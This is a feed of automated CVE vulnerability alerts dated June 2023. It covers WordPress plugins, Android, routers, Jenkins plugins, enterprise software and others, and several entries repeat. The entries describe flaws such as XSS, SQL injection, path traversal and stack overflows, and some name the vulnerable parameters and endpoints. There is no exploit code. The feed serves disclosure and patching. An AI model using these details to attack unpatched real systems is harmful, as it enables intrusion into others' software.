| 2023-06-16 00:58:36 |
🚨 CVE-2023-2688The WordPress File Upload and WordPress File Upload Pro plugins for WordPress are vulnerable to Path Traversal in versions up to, and including, 4.19.1 via the vulnerable parameter wfu_newpath. This allows administrator-level attackers to move files uploaded with the plugin (located in wp-content/uploads by default) outside of the web root.🎖@cveNotify |
|
| 2023-06-16 00:58:35 |
🚨 CVE-2023-32732gRPC contains a vulnerability whereby a client can cause a termination of connection between a HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309 https://www.google.com/url 🎖@cveNotify |
|
| 2023-06-16 00:58:34 |
🚨 CVE-2023-2584The PixelYourSite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 9.3.6 (9.6.1 in the Pro version) due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2023-06-16 00:58:33 |
🚨 CVE-2023-2556The WPCS – WordPress Currency Switcher Professional plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the anonymous function for the wpcs_sd_delete action in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete an arbitrary custom drop-down currency switcher.🎖@cveNotify |
|
| 2023-06-16 00:58:32 |
🚨 CVE-2023-2189The Elementor Addons, Widgets and Enhancements – Stax plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the toggle_widget function in versions up to, and including, 1.4.3. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to enable or disable Elementor widgets.🎖@cveNotify |
|
| 2023-06-16 00:58:30 |
🚨 CVE-2023-2159The CMP – Coming Soon & Maintenance plugin for WordPress is vulnerable to Maintenance Mode Bypass in versions up to, and including, 4.1.7. A correct cmp_bypass GET parameter in the URL (equal to the md5-hashed home_url in the default setting) allows users to visit a site placed in maintenance mode thus bypassing the plugin's provided feature.🎖@cveNotify |
|
| 2023-06-16 00:58:29 |
🚨 CVE-2023-2184The WP Responsive Tabs horizontal vertical and accordion Tabs plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.1.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-16 00:58:28 |
🚨 CVE-2023-1917The PowerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions up to, and including, 10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: A partial fix for the issue was introduced in version 10.0.1, and an additional patch (version 10.0.2) was released to address a workaround.🎖@cveNotify |
|
| 2023-06-15 22:58:28 |
🚨 CVE-2023-34242Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to version 1.13.4, when Gateway API is enabled in Cilium, the absence of a check on the namespace in which a ReferenceGrant is created could result in Cilium unintentionally gaining visibility of secrets (including certificates) and services across namespaces. An attacker on an affected cluster can leverage this issue to use cluster secrets that should not be visible to them, or communicate with services that they should not have access to. Gateway API functionality is disabled by default. This vulnerability is fixed in Cilium release 1.13.4. As a workaround, restrict the creation of `ReferenceGrant` resources to admin users by using Kubernetes RBAC.🎖@cveNotify |
|
| 2023-06-15 22:58:27 |
🚨 CVE-2023-21137In several methods of JobStore.java, uncaught exceptions in job map parsing could lead to local persistent denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-246541702🎖@cveNotify |
|
| 2023-06-15 22:58:24 |
🚨 CVE-2021-0701Product: AndroidVersions: Android SoCAndroid ID: A-277775870🎖@cveNotify |
|
| 2023-06-15 22:58:23 |
🚨 CVE-2023-21095In canStartSystemGesture of RecentsAnimationDeviceState.java, there is a possible partial lockscreen bypass due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12L Android-13Android ID: A-242704576🎖@cveNotify |
|
| 2023-06-15 22:58:22 |
🚨 CVE-2023-21115In btm_sec_encrypt_change of btm_sec.cc, there is a possible way to downgrade the link key type due to improperly used crypto. This could lead to paired device escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12LAndroid ID: A-258834033🎖@cveNotify |
|
| 2023-06-15 22:58:18 |
🚨 CVE-2023-21121In onResume of AppManagementFragment.java, there is a possible way to prevent users from forgetting a previously connected VPN due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-205460459🎖@cveNotify |
|
| 2023-06-15 22:58:17 |
🚨 CVE-2023-21130In btm_ble_periodic_adv_sync_lost of btm_ble_gap.cc, there is a possible remote code execution due to a buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-273502002🎖@cveNotify |
|
| 2023-06-15 22:58:13 |
🚨 CVE-2023-21136In multiple functions of JobStore.java, there is a possible way to cause a crash on startup due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-246542285🎖@cveNotify |
|
| 2023-06-15 22:58:12 |
🚨 CVE-2023-21141In several functions of several files, there is a possible way to access developer mode traces due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-262244249🎖@cveNotify |
|
| 2023-06-15 22:58:11 |
🚨 CVE-2023-21143In multiple functions of multiple files, there is a possible way to make the device unusable due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-268193777🎖@cveNotify |
|
| 2023-06-15 20:58:30 |
🚨 CVE-2023-21121In onResume of AppManagementFragment.java, there is a possible way to prevent users from forgetting a previously connected VPN due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-205460459🎖@cveNotify |
|
| 2023-06-15 20:58:29 |
🚨 CVE-2023-21128In various functions of AppStandbyController.java, there is a possible way to break manageability scenarios due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-272042183🎖@cveNotify |
|
| 2023-06-15 20:58:28 |
🚨 CVE-2023-21130In btm_ble_periodic_adv_sync_lost of btm_ble_gap.cc, there is a possible remote code execution due to a buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-273502002🎖@cveNotify |
|
| 2023-06-15 20:58:24 |
🚨 CVE-2023-21135In onCreate of NotificationAccessSettings.java, there is a possible failure to persist notifications settings due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-260570119🎖@cveNotify |
|
| 2023-06-15 20:58:23 |
🚨 CVE-2023-21141In several functions of several files, there is a possible way to access developer mode traces due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-262244249🎖@cveNotify |
|
| 2023-06-15 20:58:22 |
🚨 CVE-2023-21143In multiple functions of multiple files, there is a possible way to make the device unusable due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-268193777🎖@cveNotify |
|
| 2023-06-15 20:58:19 |
🚨 CVE-2023-21142In multiple files, there is a possible way to access traces in the dev mode due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-262243665🎖@cveNotify |
|
| 2023-06-15 20:58:18 |
🚨 CVE-2023-21618Adobe Substance 3D Designer version 12.4.1 (and earlier) is affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-06-15 20:58:17 |
🚨 CVE-2023-28809Some access control products are vulnerable to a session hijacking attack because the product does not update the session ID after a user successfully logs in. To exploit the vulnerability, attackers have to request the session ID at the same time as a valid user logs in, and gain device operation permissions by forging the IP and session ID of an authenticated user.🎖@cveNotify |
|
| 2023-06-15 20:58:13 |
🚨 CVE-2023-29289Adobe Commerce versions 2.4.6 (and earlier), 2.4.5-p2 (and earlier) and 2.4.4-p3 (and earlier) are affected by an XML Injection vulnerability. An attacker with low privileges can trigger a specially crafted script to a security feature bypass. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-06-15 20:58:12 |
🚨 CVE-2023-29291Adobe Commerce versions 2.4.6 (and earlier), 2.4.5-p2 (and earlier) and 2.4.4-p3 (and earlier) are affected by a Server-Side Request Forgery (SSRF) vulnerability that could lead to arbitrary file system read. An admin-privilege authenticated attacker can force the application to make arbitrary requests via injection of arbitrary URLs. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-06-15 18:58:14 |
🚨 CVE-2023-33496xxl-rpc v1.7.0 was discovered to contain a deserialization vulnerability via the component com.xxl.rpc.core.remoting.net.impl.netty.codec.NettyDecode#decode.🎖@cveNotify |
|
| 2023-06-15 18:58:13 |
🚨 CVE-2023-2866If an attacker can trick an authenticated user into loading a maliciously crafted .zip file onto Advantech WebAccess version 8.4.5, a web shell could be used to give the attacker full control of the SCADA server. 🎖@cveNotify |
|
| 2023-06-15 17:58:15 |
🚨 CVE-2023-3274A vulnerability classified as critical has been found in code-projects Supplier Management System 1.0. Affected is an unknown function of the file btn_functions.php of the component Picture Handler. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231624.🎖@cveNotify |
|
| 2023-06-15 17:58:14 |
🚨 CVE-2023-3276A vulnerability, which was classified as problematic, has been found in Dromara HuTool up to 5.8.19. Affected by this issue is the function readBySax of the file XmlUtil.java of the component XML Parsing Module. The manipulation leads to xml external entity reference. The exploit has been disclosed to the public and may be used. VDB-231626 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-15 12:58:14 |
🚨 CVE-2023-28175Improper Authorization in SSH server in Bosch VMS 11.0, 11.1.0, and 11.1.1 allows a remote authenticated user to access resources within the trusted internal network via a port forwarding request.🎖@cveNotify |
|
| 2023-06-15 12:58:13 |
🚨 CVE-2023-32229Due to an error in the software interface to the secure element chip on Bosch IP cameras of family CPP13 and CPP14, the chip can be permanently damaged when enabling the Stream security option (signing of the video stream) with option MD5, SHA-1 or SHA-256.🎖@cveNotify |
|
| 2023-06-15 10:58:22 |
🚨 CVE-2023-2847During internal security analysis, a local privilege escalation vulnerability has been identified. On a machine with the affected ESET product installed, it was possible for a user with lower privileges due to improper privilege management to trigger actions with root privileges.ESET remedied this possible attack vector and has prepared new builds of its products that are no longer susceptible to this vulnerability.🎖@cveNotify |
|
| 2023-06-15 10:58:21 |
🚨 CVE-2023-30575Apache Guacamole 1.5.1 and older may incorrectly calculate the lengths of instruction elements sent during the Guacamole protocol handshake, potentially allowing an attacker to inject Guacamole instructions during the handshake through specially-crafted data.🎖@cveNotify |
|
| 2023-06-15 10:58:17 |
🚨 CVE-2023-30776An authenticated user with specific data permissions could access database connections stored passwords by requesting a specific REST API. This issue affects Apache Superset version 1.3.0 up to 2.0.1.🎖@cveNotify |
|
| 2023-06-15 10:58:16 |
🚨 CVE-2022-4149The Netskope client service (prior to R96) on Windows runs as NT AUTHORITY\SYSTEM which writes log files to a writable directory (C:\Users\Public\netSkope) for a standard user. The files are created and written with a SYSTEM account except one file (logplaceholder) which inherits permission giving all users full access control list. Netskope client restricts access to this file by allowing only read permissions as a standard user. Whenever the Netskope client service restarts, it deletes the logplaceholder and recreates, creating a race condition, which can be exploited by a malicious local user to create the file and set ACL permissions on the file. Once the file is created by a malicious user with proper ACL permissions, all files within C:\Users\Public\netSkope\ becomes modifiable by the unprivileged user. By using Windows pseudo-symlink, these files can be pointed to other places in the system and thus malicious users will be able to elevate privileges.🎖@cveNotify |
|
| 2023-06-15 10:58:15 |
🚨 CVE-2023-33009A buffer overflow vulnerability in the notification function in Zyxel ATP series firmware versions 4.60 through 5.36 Patch 1, USG FLEX series firmware versions 4.60 through 5.36 Patch 1, USG FLEX 50(W) firmware versions 4.60 through 5.36 Patch 1, USG20(W)-VPN firmware versions 4.60 through 5.36 Patch 1, VPN series firmware versions 4.60 through 5.36 Patch 1, ZyWALL/USG series firmware versions 4.60 through 4.73 Patch 1, could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and even a remote code execution on an affected device.🎖@cveNotify |
|
| 2023-06-15 10:58:14 |
🚨 CVE-2023-2270The Netskope client service running with NT\SYSTEM privileges accepts network connections from localhost to start various services and execute commands. The connection handling function of Netskope client before R100 in this service utilized a relative path to download and unzip configuration files on the machine. This relative path provided a way for local users to write arbitrary files at a location which is accessible to only higher privileged users. This can be exploited by local users to execute code with NT\SYSTEM privileges on the end machine.🎖@cveNotify |
|
| 2023-06-15 10:58:13 |
🚨 CVE-2023-35030Cross-site request forgery (CSRF) vulnerability in the Layout module's SEO configuration in Liferay Portal 7.4.3.70 through 7.4.3.76, and Liferay DXP 7.4 update 70 through 76 allows remote attackers to execute arbitrary code in the scripting console via the `_com_liferay_layout_admin_web_portlet_GroupPagesPortlet_backURL` parameter.🎖@cveNotify |
|
| 2023-06-15 06:58:27 |
🚨 CVE-2023-3193Cross-site scripting (XSS) vulnerability in the Layout module's SEO configuration in Liferay Portal 7.4.3.70 through 7.4.3.73, and Liferay DXP 7.4 update 70 through 73 allows remote attackers to inject arbitrary web script or HTML via the `_com_liferay_layout_admin_web_portlet_GroupPagesPortlet_backURL` parameter.🎖@cveNotify |
|
| 2023-06-15 06:58:26 |
🚨 CVE-2022-32752IBM Security Directory Suite VA 8.0.1 through 8.0.1.19 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. IBM X-Force ID: 228439.🎖@cveNotify |
|
| 2023-06-15 06:58:25 |
🚨 CVE-2022-32757IBM Security Directory Suite VA 8.0.1 through 8.0.1.19 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 228510.🎖@cveNotify |
|
| 2023-06-15 06:58:22 |
🚨 CVE-2022-33166IBM Security Directory Suite VA 8.0.1 through 8.0.1.19 could allow a privileged user to upload malicious files of dangerous types that can be automatically processed within the product's environment. IBM X-Force ID: 228586.🎖@cveNotify |
|
| 2023-06-15 06:58:21 |
🚨 CVE-2023-32573In Qt before 5.15.14, 6.0.x through 6.2.x before 6.2.9, and 6.3.x through 6.5.x before 6.5.1, QtSvg QSvgFont m_unitsPerEm initialization is mishandled.🎖@cveNotify |
|
| 2023-06-15 06:58:20 |
🚨 CVE-2022-33159IBM Security Directory Suite VA 8.0.1 through 8.0.1.19 stores user credentials in plain clear text which can be read by an authenticated user. IBM X-Force ID: 228567.🎖@cveNotify |
|
| 2023-06-15 06:58:16 |
🚨 CVE-2022-33168IBM Security Directory Suite VA 8.0.1 could allow an attacker to cause a denial of service due to uncontrolled resource consumption. IBM X-Force ID: 228588.🎖@cveNotify |
|
| 2023-06-15 06:58:15 |
🚨 CVE-2023-25683IBM PowerVM Hypervisor FW950.00 through FW950.71, FW1010.00 through FW1010.40, FW1020.00 through FW1020.20, and FW1030.00 through FW1030.11 could allow an attacker to obtain sensitive information if they gain service access to the HMC. IBM X-Force ID: 247592.🎖@cveNotify |
|
| 2023-06-15 06:58:14 |
🚨 CVE-2023-34448Grav is a flat-file content management system. Prior to version 1.7.42, the patch for CVE-2022-2073, a server-side template injection vulnerability in Grav leveraging the default `filter()` function, did not block other built-in functions exposed by Twig's Core Extension that could be used to invoke arbitrary unsafe functions, thereby allowing for remote code execution. A patch in version 1.74.2 overrides the built-in Twig `map()` and `reduce()` filter functions in `system/src/Grav/Common/Twig/Extension/GravExtension.php` to validate the argument passed to the filter in `$arrow`.🎖@cveNotify |
|
| 2023-06-15 00:58:29 |
🚨 CVE-2023-26062A mobile network solution internal fault is found in Nokia Web Element Manager before 22 R1, in which an authenticated, unprivileged user can execute administrative functions. Exploitation is not possible from outside of mobile network solution architecture. This means that exploit is not possible from mobile network user UEs, from roaming networks, or from the Internet. Exploitation is possible only from a CSP (Communication Service Provider) mobile network solution internal BTS management network.🎖@cveNotify |
|
| 2023-06-15 00:58:28 |
🚨 CVE-2023-1329A potential security vulnerability has been identified for certain HP multifunction printers (MFPs). The vulnerability may lead to Buffer Overflow and/or Remote Code Execution when running HP Workpath solutions on potentially affected products.🎖@cveNotify |
|
| 2023-06-15 00:58:27 |
🚨 CVE-2023-30150PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php.🎖@cveNotify |
|
| 2023-06-15 00:58:23 |
🚨 CVE-2023-33515SoftExpert Excellence Suite 2.1.9 is vulnerable to Cross Site Scripting (XSS) via query screens.🎖@cveNotify |
|
| 2023-06-15 00:58:22 |
🚨 CVE-2023-34565Netbox 3.5.1 is vulnerable to Cross Site Scripting (XSS) in the "Create Wireless LAN Groups" function.🎖@cveNotify |
|
| 2023-06-15 00:58:21 |
🚨 CVE-2023-25369Siglent SDS 1104X-E SDS1xx4X-E_V6.1.37R9.ADS is vulnerable to Denial of Service on the user interface triggered by malformed SCPI command.🎖@cveNotify |
|
| 2023-06-15 00:58:18 |
🚨 CVE-2023-34367Windows 7 is vulnerable to a full blind TCP/IP hijacking attack. The vulnerability exists in Windows 7 (any Windows until Windows 8) and in any implementation of TCP/IP, which is vulnerable to the Idle scan attack (including many IoT devices). NOTE: The vendor considers this a low severity issue.🎖@cveNotify |
|
| 2023-06-15 00:58:17 |
🚨 CVE-2023-2083The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the save function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to save plugin settings. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.🎖@cveNotify |
|
| 2023-06-15 00:58:16 |
🚨 CVE-2023-2084The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the get function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to obtain plugin settings. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.🎖@cveNotify |
|
| 2023-06-15 00:58:13 |
🚨 CVE-2023-2085The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the templates function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to obtain plugin template information. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.🎖@cveNotify |
|
| 2023-06-15 00:58:12 |
🚨 CVE-2023-33533Netgear D6220 with Firmware Version 1.0.0.80, D8500 with Firmware Version 1.0.3.60, R6700 with Firmware Version 1.0.2.26, and R6900 with Firmware Version 1.0.2.26 are vulnerable to Command Injection. If an attacker gains web management privileges, they can inject commands into the post request parameters, gaining shell privileges.🎖@cveNotify |
|
| 2023-06-15 00:58:11 |
🚨 CVE-2023-1016The Intuitive Custom Post Order plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.1.3, due to insufficient escaping on the user supplied 'objects' and 'tags' parameters and lack of sufficient preparation in the 'update_options' function as well as the 'refresh' function which runs queries on the same values. This allows authenticated attackers, with administrator permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Note that this attack may only be practical on configurations where it is possible to bypass addslashes due to the database using a nonstandard character set such as GBK.🎖@cveNotify |
|
| 2023-06-14 19:58:31 |
🚨 CVE-2023-33652Sitecore Experience Platform (XP) v9.3 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the component /sitecore/shell/Invoke.aspx.🎖@cveNotify |
|
| 2023-06-14 19:58:30 |
🚨 CVE-2022-31641Potential vulnerabilities have been identified in the system BIOS of certain HP PC products, which might allow arbitrary code execution, escalation of privilege, denial of service, and information disclosure.🎖@cveNotify |
|
| 2023-06-14 19:58:29 |
🚨 CVE-2023-0009A local privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows enables a local service account or user with token impersonation privileges to execute programs with elevated privileges.🎖@cveNotify |
|
| 2023-06-14 19:58:25 |
🚨 CVE-2023-25367Siglent SDS 1104X-E SDS1xx4X-E_V6.1.37R9.ADS allows unfiltered user input resulting in Remote Code Execution (RCE) with SCPI interface or web server.🎖@cveNotify |
|
| 2023-06-14 19:58:24 |
🚨 CVE-2023-3066Incorrect Authorization vulnerability in Mobatime mobile application AMXGT100 allows a low-privileged user to impersonate anyone else, including administratorsThis issue affects Mobatime mobile application AMXGT100: through 1.3.20.🎖@cveNotify |
|
| 2023-06-14 19:58:23 |
🚨 CVE-2023-34567Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter list at /goform/SetVirtualServerCfg.🎖@cveNotify |
|
| 2023-06-14 19:58:19 |
🚨 CVE-2023-34568Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter time at /goform/PowerSaveSet.🎖@cveNotify |
|
| 2023-06-14 19:58:18 |
🚨 CVE-2023-34570Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter devName at /goform/SetOnlineDevName.🎖@cveNotify |
|
| 2023-06-14 19:58:17 |
🚨 CVE-2023-34571Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter shareSpeed at /goform/WifiGuestSet.🎖@cveNotify |
|
| 2023-06-14 19:58:14 |
🚨 CVE-2023-34867Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_property_hashmap_create at jerry-core/ecma/base/ecma-property-hashmap.c.🎖@cveNotify |
|
| 2023-06-14 19:58:13 |
🚨 CVE-2023-27476OWSLib is a Python package for client programming with Open Geospatial Consortium (OGC) web service interface standards, and their related content models. OWSLib's XML parser (which supports both `lxml` and `xml.etree`) does not disable entity resolution, and could lead to arbitrary file reads from an attacker-controlled XML payload. This affects all XML parsing in the codebase. This issue has been addressed in version 0.28.1. All users are advised to upgrade. The only known workaround is to patch the library manually. See `GHSA-8h9c-r582-mggc` for details.🎖@cveNotify |
|
| 2023-06-14 19:58:12 |
🚨 CVE-2021-4348The Ultimate GDPR & CCPA plugin for WordPress is vulnerable to unauthenticated settings import and export via the export_settings & import_settings functions in versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to change plugin settings and conduct attacks such as redirecting visitors to malicious sites.🎖@cveNotify |
|
| 2023-06-14 17:58:30 |
🚨 CVE-2023-32465Dell Power Protect Cyber Recovery, contains an Authentication Bypass vulnerability. An attacker could potentially exploit this vulnerability, leading to unauthorized admin access to the Cyber Recovery application. Exploitation may lead to complete system takeover by an attacker.🎖@cveNotify |
|
| 2023-06-14 17:58:29 |
🚨 CVE-2023-34754bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the pid parameter at admin/index.php?mode=settings&page=plugins&action=edit.🎖@cveNotify |
|
| 2023-06-14 17:58:28 |
🚨 CVE-2023-34612An issue was discovered ph-json thru 9.5.5 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.🎖@cveNotify |
|
| 2023-06-14 17:58:24 |
🚨 CVE-2023-29326.NET Framework Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-14 17:58:23 |
🚨 CVE-2023-34615An issue was discovered JSONUtil thru 5.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.🎖@cveNotify |
|
| 2023-06-14 17:58:22 |
🚨 CVE-2023-34616An issue was discovered pbjson thru 0.4.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.🎖@cveNotify |
|
| 2023-06-14 17:58:18 |
🚨 CVE-2023-34617An issue was discovered genson thru 1.6 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.🎖@cveNotify |
|
| 2023-06-14 17:58:17 |
🚨 CVE-2023-32031Microsoft Exchange Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-14 17:58:16 |
🚨 CVE-2023-34623An issue was discovered jtidy thru r938 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.🎖@cveNotify |
|
| 2023-06-14 17:58:13 |
🚨 CVE-2023-34624An issue was discovered htmlcleaner thru = 2.28 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.🎖@cveNotify |
|
| 2023-06-14 17:58:12 |
🚨 CVE-2023-34752bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit.🎖@cveNotify |
|
| 2023-06-14 17:58:11 |
🚨 CVE-2023-34753bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.🎖@cveNotify |
|
| 2023-06-14 14:58:33 |
🚨 CVE-2023-35143Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape the versions of build artifacts on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control maven project versions in `pom.xml`.🎖@cveNotify |
|
| 2023-06-14 14:58:32 |
🚨 CVE-2023-35145Jenkins Sonargraph Integration Plugin 5.0.1 and earlier does not escape the file path and the project name for the Log file field form validation, resulting in a stored cross-site scripting vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-06-14 14:58:31 |
🚨 CVE-2023-35144Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape project and build display names on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2023-06-14 14:58:30 |
🚨 CVE-2023-35147Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not restrict the AWS SQS queue name path parameter in an HTTP endpoint, allowing attackers with Item/Read permission to obtain the contents of arbitrary files on the Jenkins controller file system.🎖@cveNotify |
|
| 2023-06-14 14:58:26 |
🚨 CVE-2023-35146Jenkins Template Workflows Plugin 41.v32d86a_313b_4a and earlier does not escape names of jobs used as buildings blocks for Template Workflow Job, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create jobs.🎖@cveNotify |
|
| 2023-06-14 14:58:25 |
🚨 CVE-2023-35149A missing permission check in Jenkins Digital.ai App Management Publisher Plugin 2.6 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-06-14 14:58:24 |
🚨 CVE-2023-3036An unchecked read in NTP server in github.com/cloudflare/cfnts prior to commit 783490b https://github.com/cloudflare/cfnts/commit/783490b913f05e508a492cd7b02e3c4ec2297b71 enabled a remote attacker to trigger a panic by sending an NTSAuthenticator packet with extension length longer than the packet contents.🎖@cveNotify |
|
| 2023-06-14 14:58:20 |
🚨 CVE-2023-3040A debug function in the lua-resty-json package, up to commit id 3ef9492bd3a44d9e51301d6adc3cd1789c8f534a (merged in PR #14) contained an out of bounds access bug that could have allowed an attacker to launch a DoS if the function was used to parse untrusted input data. It is important to note that because this debug function was only used in tests and demos, it was not exploitable in a normal environment.🎖@cveNotify |
|
| 2023-06-14 14:58:19 |
🚨 CVE-2023-3234A vulnerability was found in Zhong Bang CRMEB up to 4.6.0. It has been declared as problematic. Affected by this vulnerability is the function put_image of the file api/controller/v1/PublicController.php. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231505 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-14 14:58:18 |
🚨 CVE-2023-3227Insufficient Granularity of Access Control in GitHub repository fossbilling/fossbilling prior to 0.5.0.🎖@cveNotify |
|
| 2023-06-14 14:58:14 |
🚨 CVE-2023-3228Business Logic Errors in GitHub repository fossbilling/fossbilling prior to 0.5.0.🎖@cveNotify |
|
| 2023-06-14 14:58:13 |
🚨 CVE-2023-0837An improper authorization check of local device settings in TeamViewer Remote between version 15.41 and 15.42.7 for Windows and macOS allows an unprivileged user to change basic local device settings even though the options were locked. This can result in unwanted changes to the configuration.🎖@cveNotify |
|
| 2023-06-14 14:58:12 |
🚨 CVE-2023-1049A CWE-94: Improper Control of Generation of Code ('Code Injection') vulnerability exists thatcould cause execution of malicious code when an unsuspicious user loads a project file from thelocal filesystem into the HMI.🎖@cveNotify |
|
| 2023-06-14 10:58:27 |
🚨 CVE-2023-28069Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. A remote unauthenticated attacker can phish the legitimate user to redirect to malicious website leading to information disclosure and launch of phishing attacks.🎖@cveNotify |
|
| 2023-06-14 10:58:26 |
